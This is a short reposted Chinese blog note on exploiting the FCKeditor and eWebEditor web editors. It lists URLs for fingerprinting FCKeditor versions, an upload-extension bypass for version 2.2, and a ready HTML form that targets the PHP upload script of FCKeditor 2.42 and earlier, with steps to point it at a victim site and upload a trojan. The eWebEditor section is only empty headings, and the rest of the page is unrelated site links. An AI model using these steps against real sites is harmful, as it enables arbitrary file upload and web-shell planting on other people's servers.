fck与eweb编辑器的利用

其他 2018-09-01 09:45:58 阅读次数: 0

fck与eweb编辑器的利用

fckeditor

查看编辑器版本

  • FCKeditor/_whatsnew.html
  • /fckeditor/editor/dialg/fck_about.html

version2.2版本

  • Apache+linux环境下在上传文件后面加个.突破,测试通过

version<=2.42 for php

  • form id ="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanage/upload/php/upload.php?Type=Media" method="post"> Upload a new file:<input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form>
  • 复制上述代码到文件x.html中,链接改成该网站存在该fck版本上传文件的链接
  • 打开文件,进行上传木马

版本漏洞很多

ewebeditor

有修改权限的版本

  • 修改样式

无修改权限的版本

猜你喜欢

转载自blog.csdn.net/THTBOOM/article/details/81841274
今日推荐
周排行
AIZU 2224 Save your cats(并查集)
HTTP响应头状态码详解
Python socket编程(2)
MaxCompute Studio使用心得系列7—作业对比
Supervisor安装使用
LeetCode 164. Maximum Gap
mysql面试题: 一张表里面有ID自增主键,当insert了17条记录之后,删除了第15,16,17条记录,再把mysql重启,再insert一条记录,这条记录的ID是18还是15
nutch1.2 DeleteDuplicates IndexMerger 详解
OC - @property与setter,getter方法
SpringBoot @Transactional的rollbackFor属性
每日归档
更多
2024-09-19(0)
2024-09-18(0)
2024-09-17(0)
2024-09-16(0)
2024-09-15(0)
2024-09-14(0)
2024-09-13(0)
2024-09-12(0)
2024-09-11(0)
2024-09-10(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022